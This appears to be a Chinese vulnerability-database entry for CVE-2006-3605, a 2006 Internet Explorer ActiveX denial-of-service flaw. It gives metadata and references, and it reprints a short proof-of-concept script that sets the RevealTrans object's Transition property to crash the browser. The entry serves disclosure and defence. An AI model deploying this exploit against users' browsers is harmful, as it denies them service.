Microsoft IE ActiveX对象Transition属性拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110599 漏洞类型 其他
发布时间 2006-07-12 更新时间 2007-06-27
CVE编号 CVE-2006-3605 CNNVD-ID CNNVD-200607-252
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28213
https://www.securityfocus.com/bid/18960
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-252
|漏洞详情
MicrosoftInternetExplorer是微软发布的非常流行的WEB浏览器。InternetExplorer在处理某些非预期的ActiveX对象操作时存在漏洞,远程攻击者可能利用此漏洞导致IE崩溃。InternetExplorer在处理为ActiveX对象的Transition属性赋值时会引发空指针引用错误,从而导致浏览器崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/18960/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
	a.Transition = 1;
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
|受影响的产品
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Se
|参考资料

来源:XF
名称:ie-revealtrans-dos(27713)
链接:http://xforce.iss.net/xforce/xfdb/27713
来源:BID
名称:18960
链接:http://www.securityfocus.com/bid/18960
来源:OSVDB
名称:27057
链接:http://www.osvdb.org/27057
来源:VUPEN
名称:ADV-2006-2793
链接:http://www.frsirt.com/english/advisories/2006/2793
来源:MISC
链接:http://browserfun.blogspot.com/2006/07/mobb-13-revealtrans-transition.html